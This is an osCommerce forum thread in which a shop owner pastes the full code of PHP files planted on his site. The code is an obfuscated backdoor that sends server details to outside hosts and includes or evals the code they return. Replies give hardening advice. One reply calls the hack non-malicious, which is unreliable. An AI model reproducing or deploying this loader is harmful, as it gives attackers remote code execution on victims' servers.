Unusual files on catalog/admin directories

[Qvomos]

Hello folks, great Sunday to you all.

I was doing my bi-weekly cleanup and updates to the site and when I noticed several files scattared throughout the catalog/admin directories.

They all php with names like 130283.php (catalog/download) or 86025.php (catalog/images) or 118071.php (catalog/admin/backups)

All have the same code:

================

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else if (include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str));else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3MvPw==").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

================

I certainly did not put them in there so I am not sure what's hapenning. Have I been hacked or something?

Any help someone can possibly give would be much appreciated.

Thank you in advance

 

Jayme

[germ]

Yes, you're a hack victim.

 

Probably because your images folder has 777 permissions.

 

No web accessible folder should have permissions higher than 755

[Qvomos]

Thank you for your information Jim.

[germ]

From what I've been able to gather it's not a malicious nor destructive hack.

 

It's a "pay per click" scam.

 

This hack plants these files then seeds search engines with links to these files.

 

Then whomever runs the scam just sits back and gets paid for every click someone uses that leads to these files.

 

It happened to the site I manage back in March.

:blush:

 

Be sure you check ALL your folders for these bogus files.

 

If you change the images folder permissions to 755 and get an error in your osC admin about the images folder not being writable, as far as I know you have two options:

 

1. Use your cpanel to change the permissions to 777 while you're adding/updating categories and products and pray a hacking robot doesn't get you again while you're doing this.

 

2. Install a contribution called "osCFileBrowser". Using this contrib you must upload images in advance to your images folder (via FTP, Cpanel or whatever) and in your admin you have a window to the images folder that will popup and you pick the image.

 

There may be other ways.

 

If you want the link to the contribution I can find it.

 

That's the route I took to solve the problem.

[spax]

In addition to Jim's advise, install Jack's SiteMonitor contribution so you can get immediate notification of any file changes or additions on your server.

[Qvomos]

Thanks again Jim.

From what I understand on your note it doesn't sound too malicious in nature.

However I do sell digital downloads and and they are very unique and sought after. I did have one of those files inside the catalog/download folder. Any possibility that my inventory was downloaded?

Thanks again for all the information you have given my.

I have cleaned up all the directories and taken the apropriate measures to ensure this will not happen again, including installation of the mods you suggested.

Thak you too Spax :)

 

Cheers

 

Jayme

[germ]

If this is the hack I think it is, it's only purpose is a pay per click scam.

 

I doubt inventory was compromised.

 

If you use Paypal as a payment option there is a way people can trick osC into thinking the download has been paid for and they get the download for free.

 

Just thought I'd toss that in in case you didn't know that.

 

There is a thread around here discussing this very subject.

[Qvomos]

I am using PayPal IPN 2.33 and yes I did see this infamous post. I tried it on the site with no success. I belive checkout process is fundamental for this hack to work but some how I wasn't able to bring out the page during my attempts. I could be wrong but I've read the IPN is the key to safeguard against this hack.